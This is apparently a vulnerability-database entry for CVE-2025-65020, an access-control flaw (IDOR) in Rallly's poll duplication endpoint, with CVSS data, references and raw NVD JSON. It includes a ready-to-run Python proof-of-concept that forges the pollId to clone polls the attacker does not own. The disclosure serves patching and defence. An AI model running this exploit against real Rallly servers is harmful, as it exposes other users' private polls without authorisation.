Security Vulnerability Report
CVE-2025-65020 (CVSS 6.5, MEDIUM)

Published: 2025-11-19 18:15:49
Last Modified: 2025-11-25 15:33:06

Description

Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability in the poll duplication endpoint (/api/trpc/polls.duplicate) allows any authenticated user to duplicate polls they do not own by modifying the pollId parameter. This effectively bypasses access control and lets unauthorized users clone private or administrative polls. This issue has been patched in version 4.5.4.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:* - VULNERABLE
Rallly < 4.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-65020 PoC - Rallly IDOR Vulnerability
# Target: Rallly < 4.5.4
# Endpoint: /api/trpc/polls.duplicate

TARGET_URL = "https://vulnerable-rallly-instance.com"
ATTACKER_TOKEN = "attacker_auth_token_here"
TARGET_POLL_ID = "victim_private_poll_id"  # ID of poll to duplicate


def exploit_idor():
    """
    Exploit IDOR vulnerability in Rallly poll duplication endpoint.

    This PoC demonstrates how an authenticated attacker can duplicate
    any poll by modifying the pollId parameter.
    """
    headers = {
        'Content-Type': 'application/json',
        'Authorization': f'Bearer {ATTACKER_TOKEN}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    # Malicious request with victim poll ID (tRPC batch request envelope)
    payload = {
        'json': {
            '0': {
                'json': {
                    'pollId': TARGET_POLL_ID  # Attacker-controlled poll ID
                }
            }
        }
    }

    endpoint = f"{TARGET_URL}/api/trpc/polls.duplicate"

    try:
        response = requests.post(endpoint, headers=headers, json=payload)

        if response.status_code == 200:
            result = response.json()
            if 'result' in result:
                new_poll_id = result['result']['data']['json']['id']
                print("[+] SUCCESS: Poll duplicated successfully!")
                print(f"[+] New Poll ID: {new_poll_id}")
                print(f"[+] Access new poll at: {TARGET_URL}/poll/{new_poll_id}")
                return new_poll_id
        elif response.status_code == 401:
            print("[-] Authentication failed")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

    return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65020 - Rallly IDOR PoC")
    print("=" * 60)
    exploit_idor()
```

References

https://github.com/lukevella/rallly/releases/tag/v4.5.4 (Release Notes)
https://github.com/lukevella/rallly/security/advisories/GHSA-44w7-pf32-gv5m (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65020", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:49.477", "lastModified": "2025-11-25T15:33:05.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability in the poll duplication endpoint (/api/trpc/polls.duplicate) allows any authenticated user to duplicate polls they do not own by modifying the pollId parameter. This effectively bypasses access control and lets unauthorized users clone private or administrative polls. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-44w7-pf32-gv5m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}